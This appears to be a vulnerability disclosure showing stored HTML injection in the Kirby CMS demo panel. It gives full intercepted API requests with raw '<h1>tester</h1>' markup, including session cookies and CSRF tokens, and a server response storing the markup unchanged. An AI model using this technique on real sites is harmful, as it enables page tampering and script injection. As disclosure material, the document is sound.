The tester found that HTML code could be injected into the web page. Although the front-end normally encodes the submitted payload by default, intercepting the request and modifying it to contain the raw HTML caused the server to accept and store that HTML unchanged (the response body below returns it as-is), so the HTML injection succeeded once the request was accepted.
Original Request :
POST /BGZUwFZY/api/pages/microsite HTTP/1.1
Host: trykirby.com
Cookie: kirby_session=910521efece58be7ce81f24f7c2b5978f21a791a%2B1707762274.dd8b11107e02a3859af3.2da7b8302b8e19193900caedabf370a68d674e23f80cf58135327d573242604b; instance=410dd31498585dbf2529a45d1da40600f8a7c87c%2Bhttps%3A%2F%2Ftrykirby.com%2FBGZUwFZY%2F; snipcart-cart=37440eed-2a09-4ed3-b534-515b00f4301c
Content-Length: 371
Sec-Ch-Ua: "Not A(Brand";v="99", "Microsoft Edge";v="121", "Chromium";v="121"
X-Language: null
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0
Content-Type: application/json
X-Csrf: dffaa6b125814485f872c3bfb34fa828d0bdbb5597fa0cbfcd8306bf6f302683
X-Http-Method-Override: PATCH
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://trykirby.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: same-origin
Sec-Fetch-Dest: empty
Referer: https://trykirby.com/BGZUwFZY/panel/pages/microsite?tab=content
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
{"modules":[{"attrs":[],"columns":[{"blocks":[{"content":{"text":"**<p><h1>tester</h1></p>**"},"id":"970d3d93-f87c-4a36-a912-018a262e3b1d","isHidden":false,"type":"text"}],"id":"4007332a-999e-4aa2-966b-53ddc76b0ae2","width":"1/1"}],"id":"36dc9245-8867-4f8a-b2cd-2496d3998ffa"}],"description":"Representative one-pagers for your product","uuid":"VZlscZfc8c5gEiwM"}
Modified Request :
POST /BGZUwFZY/api/pages/microsite HTTP/1.1
Host: trykirby.com
Cookie: kirby_session=910521efece58be7ce81f24f7c2b5978f21a791a%2B1707762274.dd8b11107e02a3859af3.2da7b8302b8e19193900caedabf370a68d674e23f80cf58135327d573242604b; instance=410dd31498585dbf2529a45d1da40600f8a7c87c%2Bhttps%3A%2F%2Ftrykirby.com%2FBGZUwFZY%2F; snipcart-cart=37440eed-2a09-4ed3-b534-515b00f4301c
Content-Length: 352
Sec-Ch-Ua: "Not A(Brand";v="99", "Microsoft Edge";v="121", "Chromium";v="121"
X-Language: null
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0
Content-Type: application/json
X-Csrf: dffaa6b125814485f872c3bfb34fa828d0bdbb5597fa0cbfcd8306bf6f302683
X-Http-Method-Override: PATCH
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://trykirby.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: same-origin
Sec-Fetch-Dest: empty
Referer: https://trykirby.com/BGZUwFZY/panel/pages/microsite?tab=content
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
{"modules":[{"attrs":[],"columns":[{"blocks":[{"content":{"text":"**<h1>tester</h1>**"},"id":"970d3d93-f87c-4a36-a912-018a262e3b1d","isHidden":false,"type":"text"}],"id":"4007332a-999e-4aa2-966b-53ddc76b0ae2","width":"1/1"}],"id":"36dc9245-8867-4f8a-b2cd-2496d3998ffa"}],"description":"Representative one-pagers for your product","uuid":"VZlscZfc8c5gEiwM"}
Response :
HTTP/1.1 200 OK
Date: Mon, 12 Feb 2024 17:02:32 GMT
Server: Apache
Cache-Control: no-store, private
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Content-Length: 874
Connection: close
Content-Type: application/json; charset=UTF-8
{"code":200,"data":{"content":{"modules":[{"attrs":[],"columns":[{"blocks":[{"content":{"text":"<h1>tester<\\/h1>"},"id":"970d3d93-f87c-4a36-a912-018a262e3b1d","isHidden":false,"type":"text"}],"id":"4007332a-999e-4aa2-966b-53ddc76b0ae2","width":"1\\/1"}],"id":"36dc9245-8867-4f8a-b2cd-2496d3998ffa"}],"title":"Microsite","description":"Representative one-pagers for your product","uuid":"VZlscZfc8c5gEiwM"},"id":"microsite","num":6,"options":{"access":true,"changeSlug":false,"changeStatus":false,"changeTemplate":false,"changeTitle":false,"create":true,"delete":false,"duplicate":false,"list":true,"move":true,"preview":true,"read":true,"sort":true,"update":true},"parent":null,"slug":"microsite","status":"listed","template":"microsite","title":"Microsite","url":"https:\\/\\/trykirby.com\\/BGZUwFZY\\/microsite","uuid":"page:\\/\\/VZlscZfc8c5gEiwM"},"status":"ok","type":"model"}
Request :
POST /BGZUwFZY/api/pages/home HTTP/1.1
Host: trykirby.com
Cookie: kirby_session=910521efece58be7ce81f24f7c2b5978f21a791a%2B1707762274.dd8b11107e02a3859af3.2da7b8302b8e19193900caedabf370a68d674e23f80cf58135327d573242604b; instance=410dd31498585dbf2529a45d1da40600f8a7c87c%2Bhttps%3A%2F%2Ftrykirby.com%2FBGZUwFZY%2F; snipcart-cart=37440eed-2a09-4ed3-b534-515b00f4301c
Content-Length: 181
Sec-Ch-Ua: "Not A(Brand";v="99", "Microsoft Edge";v="121", "Chromium";v="121"
X-Language: null
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0
Content-Type: application/json
X-Csrf: dffaa6b125814485f872c3bfb34fa828d0bdbb5597fa0cbfcd8306bf6f302683
X-Http-Method-Override: PATCH
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://trykirby.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: same-origin
Sec-Fetch-Dest: empty
Referer: https://trykirby.com/BGZUwFZY/panel/pages/home
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
{"heading":"<h1>tester</h1>","panelheading":"<h1>tester</h1>","aboutheading":"<h1>tester</h1>","paneltext":"<h1>tester</h1>","abouttext":"<h1>tester</h1>","uuid":"VP6AN8HYZDCLorHB"}
Response :